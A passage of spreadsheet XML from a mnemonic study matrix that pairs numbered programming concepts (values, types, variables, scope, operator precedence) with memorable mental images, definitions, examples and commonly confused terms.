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x" sheetId="1" state="visible" r:id="rId1"/>
    <sheet name="taxonomy" sheetId="2" state="visible" r:id="rId2"/>
    <sheet name="tuto" sheetId="3" state="visible" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'matrix'!$A$1:$P$1001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CE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28" customWidth="1" min="3" max="3"/>
    <col width="52" customWidth="1" min="4" max="4"/>
    <col width="52" customWidth="1" min="5" max="5"/>
    <col width="42" customWidth="1" min="6" max="6"/>
    <col width="40" customWidth="1" min="7" max="7"/>
    <col width="34" customWidth="1" min="8" max="8"/>
    <col width="26" customWidth="1" min="9" max="9"/>
    <col width="30" customWidth="1" min="10" max="10"/>
    <col width="30" customWidth="1" min="11" max="11"/>
    <col width="34" customWidth="1" min="14" max="14"/>
    <col width="6" customWidth="1" min="15" max="15"/>
    <col width="7" customWidth="1" min="16" max="16"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>Learned (0/1)</t>
        </is>
      </c>
      <c r="B1" s="1" t="inlineStr">
        <is>
          <t>Code</t>
        </is>
      </c>
      <c r="C1" s="1" t="inlineStr">
        <is>
          <t>Concept</t>
        </is>
      </c>
      <c r="D1" s="1" t="inlineStr">
        <is>
          <t>Anchor (mental image)</t>
        </is>
      </c>
      <c r="E1" s="1" t="inlineStr">
        <is>
          <t>Definition</t>
        </is>
      </c>
      <c r="F1" s="1" t="inlineStr">
        <is>
          <t>Example</t>
        </is>
      </c>
      <c r="G1" s="1" t="inlineStr">
        <is>
          <t>Attention doublon / confusables</t>
        </is>
      </c>
      <c r="H1" s="1" t="inlineStr">
        <is>
          <t>Non retenu mais convient (alt. anchors)</t>
        </is>
      </c>
      <c r="I1" s="1" t="inlineStr">
        <is>
          <t>Autre idée difficile à utiliser</t>
        </is>
      </c>
      <c r="J1" s="1" t="inlineStr">
        <is>
          <t>Domain</t>
        </is>
      </c>
      <c r="K1" s="1" t="inlineStr">
        <is>
          <t>Category</t>
        </is>
      </c>
      <c r="N1" s="1" t="inlineStr">
        <is>
          <t>A FAIRE</t>
        </is>
      </c>
      <c r="O1" s="1" t="inlineStr">
        <is>
          <t>!!!!</t>
        </is>
      </c>
      <c r="P1" s="1" t="inlineStr">
        <is>
          <t>done</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="n">
        <v>0</v>
      </c>
      <c r="B2" t="inlineStr">
        <is>
          <t>000</t>
        </is>
      </c>
      <c r="C2" t="inlineStr">
        <is>
          <t>Value</t>
        </is>
      </c>
      <c r="D2" t="inlineStr">
        <is>
          <t>In an empty white warehouse stenciled 000, a single marble rests on the bare concrete: the first thing that exists. Everything ever built will just be shelving for marbles.</t>
        </is>
      </c>
      <c r="E2" t="inlineStr">
        <is>
          <t>A value is a piece of data an expression evaluates to - the atom every computation produces and consumes.</t>
        </is>
      </c>
      <c r="F2" t="inlineStr">
        <is>
          <t>42, 3.14, "hi" - each evaluates to itself</t>
        </is>
      </c>
      <c r="G2" t="inlineStr">
        <is>
          <t>Variable - a variable is a name that refers to a value; the value is the data itself.</t>
        </is>
      </c>
      <c r="H2" t="inlineStr">
        <is>
          <t>A gold coin alone in an unlit vault</t>
        </is>
      </c>
      <c r="J2" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K2" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
      <c r="N2" t="inlineStr">
        <is>
          <t>per-language variants (Python/JS/Go) as extra columns</t>
        </is>
      </c>
      <c r="O2" t="inlineStr"/>
      <c r="P2" t="inlineStr"/>
    </row>
    <row r="3">
      <c r="A3" t="n">
        <v>0</v>
      </c>
      <c r="B3" t="inlineStr">
        <is>
          <t>001</t>
        </is>
      </c>
      <c r="C3" t="inlineStr">
        <is>
          <t>Integer type</t>
        </is>
      </c>
      <c r="D3" t="inlineStr">
        <is>
          <t>A grumpy census-taker counts sheep through a gate - 'one... two...' - and snaps his pencil in half when a half-sheep tries to pass. Whole things only.</t>
        </is>
      </c>
      <c r="E3" t="inlineStr">
        <is>
          <t>An integer type stores whole numbers exactly, as fixed-width binary (32/64-bit) or arbitrary precision as in Python.</t>
        </is>
      </c>
      <c r="F3" t="inlineStr">
        <is>
          <t>n = 42; type(n) is int; Python ints never overflow</t>
        </is>
      </c>
      <c r="G3" t="inlineStr">
        <is>
          <t>Float - floats trade exactness for fractional range; ints are exact whole numbers.</t>
        </is>
      </c>
      <c r="H3" t="inlineStr">
        <is>
          <t>Lego bricks that only snap at full studs</t>
        </is>
      </c>
      <c r="J3" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K3" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
      <c r="N3" t="inlineStr">
        <is>
          <t>draw or generate a picture per anchor</t>
        </is>
      </c>
      <c r="O3" t="inlineStr"/>
      <c r="P3" t="inlineStr"/>
    </row>
    <row r="4">
      <c r="A4" t="n">
        <v>0</v>
      </c>
      <c r="B4" t="inlineStr">
        <is>
          <t>002</t>
        </is>
      </c>
      <c r="C4" t="inlineStr">
        <is>
          <t>Floating-point type</t>
        </is>
      </c>
      <c r="D4" t="inlineStr">
        <is>
          <t>A number lounging on a pool float: the decimal point slides up and down its body as the exponent tide rises and falls - the point literally floats.</t>
        </is>
      </c>
      <c r="E4" t="inlineStr">
        <is>
          <t>A float approximates real numbers with a sign, binary exponent, and fixed-size mantissa, so most decimals are stored inexactly.</t>
        </is>
      </c>
      <c r="F4" t="inlineStr">
        <is>
          <t>x = 0.1 # stored as the nearest binary fraction</t>
        </is>
      </c>
      <c r="G4" t="inlineStr">
        <is>
          <t>Decimal type - Decimal stores base-10 digits exactly; float is binary and approximate.</t>
        </is>
      </c>
      <c r="H4" t="inlineStr">
        <is>
          <t>A hot-air balloon whose altitude dial is the exponent</t>
        </is>
      </c>
      <c r="J4" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K4" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
      <c r="N4" t="inlineStr">
        <is>
          <t>fuse each code with the French Millenium peg image (00.Memory_systems/01.Millenium)</t>
        </is>
      </c>
      <c r="O4" t="inlineStr">
        <is>
          <t>!!!!</t>
        </is>
      </c>
      <c r="P4" t="inlineStr"/>
    </row>
    <row r="5">
      <c r="A5" t="n">
        <v>0</v>
      </c>
      <c r="B5" t="inlineStr">
        <is>
          <t>003</t>
        </is>
      </c>
      <c r="C5" t="inlineStr">
        <is>
          <t>Boolean</t>
        </is>
      </c>
      <c r="D5" t="inlineStr">
        <is>
          <t>A brass light switch shaped like George Boole's mustache: it clicks fully up or fully down with a loud snap - there is physically no in-between position.</t>
        </is>
      </c>
      <c r="E5" t="inlineStr">
        <is>
          <t>A boolean is a type with exactly two values, true and false, the result type of comparisons and the fuel of conditions.</t>
        </is>
      </c>
      <c r="F5" t="inlineStr">
        <is>
          <t>flag = True; 3 &gt; 2 evaluates to True</t>
        </is>
      </c>
      <c r="G5" t="inlineStr">
        <is>
          <t>Truthiness - truthiness coerces any value to a bool in conditions; bool itself has only True/False.</t>
        </is>
      </c>
      <c r="H5" t="inlineStr">
        <is>
          <t>A two-sided coin welded so it can never land on its edge</t>
        </is>
      </c>
      <c r="J5" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K5" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
      <c r="N5" t="inlineStr">
        <is>
          <t>review confusables after first learning pass</t>
        </is>
      </c>
      <c r="O5" t="inlineStr"/>
      <c r="P5" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" t="n">
        <v>0</v>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>004</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>Character type</t>
        </is>
      </c>
      <c r="D6" t="inlineStr">
        <is>
          <t>A theater full of actors ('characters'), each wearing a numbered badge: the actor playing 'A' flashes badge 65 at the stage door.</t>
        </is>
      </c>
      <c r="E6" t="inlineStr">
        <is>
          <t>A char holds one text symbol as a number - a Unicode code point (or UTF-16 unit in Java/C#); 'A' is 65 underneath.</t>
        </is>
      </c>
      <c r="F6" t="inlineStr">
        <is>
          <t>C: char c = 'A'; c == 65 is true. Python has no char: just "A"</t>
        </is>
      </c>
      <c r="G6" t="inlineStr">
        <is>
          <t>String - a string is a sequence of chars; a char is a single symbol/code unit.</t>
        </is>
      </c>
      <c r="H6" t="inlineStr">
        <is>
          <t>A single Scrabble tile with its point value carved on the back</t>
        </is>
      </c>
      <c r="J6" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K6" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
      <c r="N6" t="inlineStr">
        <is>
          <t>mark Learned=1 as codes are memorized; SUM at bottom tracks progress</t>
        </is>
      </c>
      <c r="O6" t="inlineStr"/>
      <c r="P6" t="inlineStr">
        <is>
          <t>done</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="n">
        <v>0</v>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>005</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>String type</t>
        </is>
      </c>
      <c r="D7" t="inlineStr">
        <is>
          <t>Letters threaded on a length of twine, clasped at both ends by two silver quote-mark clips - a literal string of characters you can wear.</t>
        </is>
      </c>
      <c r="E7" t="inlineStr">
        <is>
          <t>A string is a value holding a sequence of characters representing text, written between quotes and immutable in most languages.</t>
        </is>
      </c>
      <c r="F7" t="inlineStr">
        <is>
          <t>s = "hello"; s[1] == "e"</t>
        </is>
      </c>
      <c r="G7" t="inlineStr">
        <is>
          <t>Char - some languages distinguish 'a' (char) from "a" (a length-1 string).</t>
        </is>
      </c>
      <c r="H7" t="inlineStr">
        <is>
          <t>Alphabet beads on a necklace</t>
        </is>
      </c>
      <c r="J7" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K7" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="n">
        <v>0</v>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>006</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>Null / None</t>
        </is>
      </c>
      <c r="D8" t="inlineStr">
        <is>
          <t>You open your numbered mailbox expecting mail and find not an empty envelope but no envelope at all - just a cold draft blowing through the hole in the wall.</t>
        </is>
      </c>
      <c r="E8" t="inlineStr">
        <is>
          <t>Null/None is a sentinel value meaning 'no value here', deliberately distinct from 0, false, and empty string.</t>
        </is>
      </c>
      <c r="F8" t="inlineStr">
        <is>
          <t>x = None; x is None -&gt; True; not the same as 0 or ""</t>
        </is>
      </c>
      <c r="G8" t="inlineStr">
        <is>
          <t>Undefined (JS) - undefined means never assigned; null is an assigned 'intentionally empty'.</t>
        </is>
      </c>
      <c r="H8" t="inlineStr">
        <is>
          <t>A chair reserved with a sign reading NOBODY</t>
        </is>
      </c>
      <c r="J8" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K8" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="n">
        <v>0</v>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>007</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>Literal</t>
        </is>
      </c>
      <c r="D9" t="inlineStr">
        <is>
          <t>A stone tablet with '42' chiseled straight into it. 'Take it literally,' grunts the mason, 'no math required - it says what it is.'</t>
        </is>
      </c>
      <c r="E9" t="inlineStr">
        <is>
          <t>A literal is a value written directly in source code - 42, 3.14, "hi", True, [1,2] - denoting itself with no computation.</t>
        </is>
      </c>
      <c r="F9" t="inlineStr">
        <is>
          <t>42, "hi", [1, 2, 3] are literals; x + 1 is not</t>
        </is>
      </c>
      <c r="G9" t="inlineStr">
        <is>
          <t>Constant - a constant is a named binding that can't be reassigned; a literal is the raw notation itself.</t>
        </is>
      </c>
      <c r="H9" t="inlineStr">
        <is>
          <t>A price tag with the price printed, not calculated at the till</t>
        </is>
      </c>
      <c r="J9" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K9" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="n">
        <v>0</v>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>008</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>Implicit type coercion</t>
        </is>
      </c>
      <c r="D10" t="inlineStr">
        <is>
          <t>A pushy customs officer at the border between number-land and string-land restamps your passport to the other nationality without asking - you only notice when "11" comes out.</t>
        </is>
      </c>
      <c r="E10" t="inlineStr">
        <is>
          <t>Coercion is the language auto-converting a value's type in mixed expressions: 1 + 2.0 -&gt; 3.0; JS "1" + 1 -&gt; "11".</t>
        </is>
      </c>
      <c r="F10" t="inlineStr">
        <is>
          <t>JS: "1" + 1 -&gt; "11"; Python: 1 + 2.0 -&gt; 3.0</t>
        </is>
      </c>
      <c r="G10" t="inlineStr">
        <is>
          <t>Explicit conversion - conversion is you calling int()/str(); coercion happens automatically.</t>
        </is>
      </c>
      <c r="H10" t="inlineStr">
        <is>
          <t>A chameleon forced to change color by whatever branch it lands on</t>
        </is>
      </c>
      <c r="J10" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K10" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="n">
        <v>0</v>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>009</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>Explicit type conversion</t>
        </is>
      </c>
      <c r="D11" t="inlineStr">
        <is>
          <t>A foundry where you pour molten string "42" into an int-shaped cast; the mold takes the shape and a worker saws off the overhanging decimal tail (3.9 loses its .9).</t>
        </is>
      </c>
      <c r="E11" t="inlineStr">
        <is>
          <t>Explicit conversion (casting) deliberately transforms a value to another type - int("42") - and may lose data, as in int(3.9) -&gt; 3.</t>
        </is>
      </c>
      <c r="F11" t="inlineStr">
        <is>
          <t>int("42") -&gt; 42; int(3.9) -&gt; 3 (truncated); str(7) -&gt; "7"</t>
        </is>
      </c>
      <c r="G11" t="inlineStr">
        <is>
          <t>Coercion - coercion is automatic and invisible; conversion is programmer-requested and visible in code.</t>
        </is>
      </c>
      <c r="H11" t="inlineStr">
        <is>
          <t>A cookie cutter pressing dough into a new shape, scraps discarded</t>
        </is>
      </c>
      <c r="J11" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K11" t="inlineStr">
        <is>
          <t>Values &amp; primitive types</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="n">
        <v>0</v>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>010</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>Variable</t>
        </is>
      </c>
      <c r="D12" t="inlineStr">
        <is>
          <t>A dog tag engraved 'x' on a collar: today it's buckled on a terrier, tomorrow you unbuckle it and strap it on a greyhound - same tag, different dog.</t>
        </is>
      </c>
      <c r="E12" t="inlineStr">
        <is>
          <t>A variable is a name bound to a value or storage location, letting code refer to data that can change over time.</t>
        </is>
      </c>
      <c r="F12" t="inlineStr">
        <is>
          <t>x = 5; x = "now a string" # Python retags the name</t>
        </is>
      </c>
      <c r="G12" t="inlineStr">
        <is>
          <t>Value - the value is the data; the variable is a reusable name pointing at it.</t>
        </is>
      </c>
      <c r="H12" t="inlineStr">
        <is>
          <t>A whiteboard slot with an erasable label</t>
        </is>
      </c>
      <c r="J12" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K12" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="n">
        <v>0</v>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>011</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>Declaration</t>
        </is>
      </c>
      <c r="D13" t="inlineStr">
        <is>
          <t>A maitre d' writes 'x' on a reservation card and sets it on an empty table: the seat now exists and is claimed, but nobody is sitting in it yet.</t>
        </is>
      </c>
      <c r="E13" t="inlineStr">
        <is>
          <t>A declaration introduces a name (often with a type) to the compiler; assignment later stores a value into it.</t>
        </is>
      </c>
      <c r="F13" t="inlineStr">
        <is>
          <t>C: int x; // declared / x = 5; // assigned / JS: let x;</t>
        </is>
      </c>
      <c r="G13" t="inlineStr">
        <is>
          <t>Assignment - declaration creates the name; assignment fills it; 'int x = 5' does both at once.</t>
        </is>
      </c>
      <c r="H13" t="inlineStr">
        <is>
          <t>Staking a claim flag on an empty plot</t>
        </is>
      </c>
      <c r="J13" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K13" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="n">
        <v>0</v>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>012</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>Assignment</t>
        </is>
      </c>
      <c r="D14" t="inlineStr">
        <is>
          <t>A one-way conveyor belt feeding a bin labeled x: whatever sits on the right end rolls left into the bin, shoving the old contents out the back. Nothing ever flows rightward.</t>
        </is>
      </c>
      <c r="E14" t="inlineStr">
        <is>
          <t>Assignment stores a value into a variable with =, replacing what the name held; it is an action, not an equation.</t>
        </is>
      </c>
      <c r="F14" t="inlineStr">
        <is>
          <t>x = x + 1 # read old value, store new - not algebra</t>
        </is>
      </c>
      <c r="G14" t="inlineStr">
        <is>
          <t>Equality test - = assigns, == compares; classic C bug: if (x = 5) is always true.</t>
        </is>
      </c>
      <c r="H14" t="inlineStr">
        <is>
          <t>A crane swapping the crate on pallet x</t>
        </is>
      </c>
      <c r="J14" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K14" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" t="n">
        <v>0</v>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>013</t>
        </is>
      </c>
      <c r="C15" t="inlineStr">
        <is>
          <t>Initialization</t>
        </is>
      </c>
      <c r="D15" t="inlineStr">
        <is>
          <t>A hotel room before its first housekeeping pass: in C the bed still holds the previous stranger's leftover junk; in Go the sheets arrive factory-zeroed.</t>
        </is>
      </c>
      <c r="E15" t="inlineStr">
        <is>
          <t>Initialization gives a variable its first value; reading before it happens yields garbage (C), an error (Python), or a zero default (Go).</t>
        </is>
      </c>
      <c r="F15" t="inlineStr">
        <is>
          <t>C: int x; printf("%d", x); // garbage / Go: var x int // 0</t>
        </is>
      </c>
      <c r="G15" t="inlineStr">
        <is>
          <t>Declaration - declaring makes the name exist; initializing gives it its first value.</t>
        </is>
      </c>
      <c r="H15" t="inlineStr">
        <is>
          <t>Cracking the seal on a new jar</t>
        </is>
      </c>
      <c r="J15" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K15" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" t="n">
        <v>0</v>
      </c>
      <c r="B16" t="inlineStr">
        <is>
          <t>014</t>
        </is>
      </c>
      <c r="C16" t="inlineStr">
        <is>
          <t>Naming conventions</t>
        </is>
      </c>
      <c r="D16" t="inlineStr">
        <is>
          <t>A zoo lineup: a snake slithering flat between words (snake_case), a camel with a hump rising mid-name (camelCase), and a rearing all-caps SCREAMING snake guarding the constants cage.</t>
        </is>
      </c>
      <c r="E16" t="inlineStr">
        <is>
          <t>Case conventions (snake_case, camelCase, PascalCase, SCREAMING_SNAKE) encode a name's role; good names reveal intent.</t>
        </is>
      </c>
      <c r="F16" t="inlineStr">
        <is>
          <t>user_count (var), MAX_RETRIES (const), UserAccount (class)</t>
        </is>
      </c>
      <c r="G16" t="inlineStr">
        <is>
          <t>Keywords - keywords like if/for are reserved by the language and can't be used as names at all.</t>
        </is>
      </c>
      <c r="H16" t="inlineStr">
        <is>
          <t>Name badges in different fonts per department</t>
        </is>
      </c>
      <c r="J16" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K16" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" t="n">
        <v>0</v>
      </c>
      <c r="B17" t="inlineStr">
        <is>
          <t>015</t>
        </is>
      </c>
      <c r="C17" t="inlineStr">
        <is>
          <t>Constant</t>
        </is>
      </c>
      <c r="D17" t="inlineStr">
        <is>
          <t>A name pressed into wet cement that has since hardened: painters keep arriving with new names, but every brush bounces off the slab.</t>
        </is>
      </c>
      <c r="E17" t="inlineStr">
        <is>
          <t>A constant is a binding that cannot be reassigned after initialization - const, final, or ALL_CAPS convention in Python.</t>
        </is>
      </c>
      <c r="F17" t="inlineStr">
        <is>
          <t>JS: const PI = 3.14159; / Python: MAX_SIZE = 100 # convention only</t>
        </is>
      </c>
      <c r="G17" t="inlineStr">
        <is>
          <t>Immutable value - const stops rebinding the name; the object it points to may still mutate (JS const arr, arr.push ok).</t>
        </is>
      </c>
      <c r="H17" t="inlineStr">
        <is>
          <t>A museum piece bolted to its pedestal</t>
        </is>
      </c>
      <c r="J17" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K17" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" t="n">
        <v>0</v>
      </c>
      <c r="B18" t="inlineStr">
        <is>
          <t>016</t>
        </is>
      </c>
      <c r="C18" t="inlineStr">
        <is>
          <t>Local scope</t>
        </is>
      </c>
      <c r="D18" t="inlineStr">
        <is>
          <t>A Vegas hotel room where what happens in the function stays in the function: the moment you step out the door, every piece of furniture inside evaporates.</t>
        </is>
      </c>
      <c r="E18" t="inlineStr">
        <is>
          <t>A local variable exists only inside the function or block that declares it, unrelated to same-named variables elsewhere.</t>
        </is>
      </c>
      <c r="F18" t="inlineStr">
        <is>
          <t>def f(): x = 1 # x dies at return / print(x) # NameError</t>
        </is>
      </c>
      <c r="G18" t="inlineStr">
        <is>
          <t>Lifetime - scope is where the name is visible; lifetime is when the storage exists.</t>
        </is>
      </c>
      <c r="H18" t="inlineStr">
        <is>
          <t>A snow globe whose contents can't leave the glass</t>
        </is>
      </c>
      <c r="J18" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K18" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" t="n">
        <v>0</v>
      </c>
      <c r="B19" t="inlineStr">
        <is>
          <t>017</t>
        </is>
      </c>
      <c r="C19" t="inlineStr">
        <is>
          <t>Global scope</t>
        </is>
      </c>
      <c r="D19" t="inlineStr">
        <is>
          <t>A single town bulletin board bolted in the square with a megaphone chained to it: anyone can stroll up, repaint the board, and every reader downstream sees the graffiti.</t>
        </is>
      </c>
      <c r="E19" t="inlineStr">
        <is>
          <t>A global variable is visible throughout a module or program; any code can mutate it, creating hidden coupling and spooky action.</t>
        </is>
      </c>
      <c r="F19" t="inlineStr">
        <is>
          <t>count = 0 / def inc(): / global count; count += 1</t>
        </is>
      </c>
      <c r="G19" t="inlineStr">
        <is>
          <t>Module scope - Python 'globals' are per-module namespaces, not one program-wide pool.</t>
        </is>
      </c>
      <c r="H19" t="inlineStr">
        <is>
          <t>A shared office fridge everyone edits</t>
        </is>
      </c>
      <c r="J19" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K19" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" t="n">
        <v>0</v>
      </c>
      <c r="B20" t="inlineStr">
        <is>
          <t>018</t>
        </is>
      </c>
      <c r="C20" t="inlineStr">
        <is>
          <t>Shadowing</t>
        </is>
      </c>
      <c r="D20" t="inlineStr">
        <is>
          <t>An eclipse: the small inner moon named x slides in front of the huge outer sun named x. The sun still burns behind it, untouched and invisible, until the moon moves on.</t>
        </is>
      </c>
      <c r="E20" t="inlineStr">
        <is>
          <t>Shadowing is an inner-scope variable reusing an outer name, hiding the outer binding until the inner scope ends.</t>
        </is>
      </c>
      <c r="F20" t="inlineStr">
        <is>
          <t>x = 1 / def f(): x = 2; print(x) # 2 / f(); print(x) # outer x still 1</t>
        </is>
      </c>
      <c r="G20" t="inlineStr">
        <is>
          <t>Reassignment - reassignment changes the same binding; shadowing creates a new binding that hides the old one.</t>
        </is>
      </c>
      <c r="H20" t="inlineStr">
        <is>
          <t>A sticky note slapped over a wall plaque with the same word</t>
        </is>
      </c>
      <c r="J20" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K20" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" t="n">
        <v>0</v>
      </c>
      <c r="B21" t="inlineStr">
        <is>
          <t>019</t>
        </is>
      </c>
      <c r="C21" t="inlineStr">
        <is>
          <t>Variable lifetime</t>
        </is>
      </c>
      <c r="D21" t="inlineStr">
        <is>
          <t>A mayfly hatches at the opening brace and drops dead at the closing brace, while the granite statue in the global park watches generations of mayflies come and go.</t>
        </is>
      </c>
      <c r="E21" t="inlineStr">
        <is>
          <t>Lifetime is how long a variable's storage exists: locals die at function return; statics and globals live for the whole program.</t>
        </is>
      </c>
      <c r="F21" t="inlineStr">
        <is>
          <t>C: return &amp;local; // bug: storage dies at return</t>
        </is>
      </c>
      <c r="G21" t="inlineStr">
        <is>
          <t>Scope - scope is spatial (where visible), lifetime is temporal (how long stored); closures let lifetime outlast scope.</t>
        </is>
      </c>
      <c r="H21" t="inlineStr">
        <is>
          <t>A parking meter that expires exactly at the closing brace</t>
        </is>
      </c>
      <c r="J21" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K21" t="inlineStr">
        <is>
          <t>Variables, bindings &amp; scope basics</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" t="n">
        <v>0</v>
      </c>
      <c r="B22" t="inlineStr">
        <is>
          <t>020</t>
        </is>
      </c>
      <c r="C22" t="inlineStr">
        <is>
          <t>Expression vs statement</t>
        </is>
      </c>
      <c r="D22" t="inlineStr">
        <is>
          <t>A vending machine beside a doorman: feed the expression machine coins and a value clunks into the tray; the statement doorman just does something and hands you nothing.</t>
        </is>
      </c>
      <c r="E22" t="inlineStr">
        <is>
          <t>An expression evaluates to a value (2+3, f(x)); a statement performs an action (if, while, Python assignment) and yields none.</t>
        </is>
      </c>
      <c r="F22" t="inlineStr">
        <is>
          <t>2 + 3 # value 5 / x = 5 # Python statement: no value</t>
        </is>
      </c>
      <c r="G22" t="inlineStr">
        <is>
          <t>Expression languages - in Rust/Lisp almost everything yields a value; the test is always 'does it produce one?'</t>
        </is>
      </c>
      <c r="H22" t="inlineStr">
        <is>
          <t>A calculator vs a light switch</t>
        </is>
      </c>
      <c r="J22" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K22" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" t="n">
        <v>0</v>
      </c>
      <c r="B23" t="inlineStr">
        <is>
          <t>021</t>
        </is>
      </c>
      <c r="C23" t="inlineStr">
        <is>
          <t>Operator precedence</t>
        </is>
      </c>
      <c r="D23" t="inlineStr">
        <is>
          <t>A military mess line: the general (*) muscles in and grabs his operands off the tray first, and the private (+) is only allowed to take what's left.</t>
        </is>
      </c>
      <c r="E23" t="inlineStr">
        <is>
          <t>Precedence decides which operator binds tighter without parentheses: 2+3*4 is 2+(3*4)=14 because * outranks +.</t>
        </is>
      </c>
      <c r="F23" t="inlineStr">
        <is>
          <t>2 + 3 * 4 -&gt; 14; (2 + 3) * 4 -&gt; 20</t>
        </is>
      </c>
      <c r="G23" t="inlineStr">
        <is>
          <t>Associativity - precedence orders different operators; associativity breaks ties among equal ones.</t>
        </is>
      </c>
      <c r="H23" t="inlineStr">
        <is>
          <t>Playing cards where trumps capture first</t>
        </is>
      </c>
      <c r="J23" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K23" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" t="n">
        <v>0</v>
      </c>
      <c r="B24" t="inlineStr">
        <is>
          <t>022</t>
        </is>
      </c>
      <c r="C24" t="inlineStr">
        <is>
          <t>Associativity</t>
        </is>
      </c>
      <c r="D24" t="inlineStr">
        <is>
          <t>Tug-of-war between identical twins: the minus twins always drag the rope leftward, evaluating from the left, while the exponent twins yank everything to the right.</t>
        </is>
      </c>
      <c r="E24" t="inlineStr">
        <is>
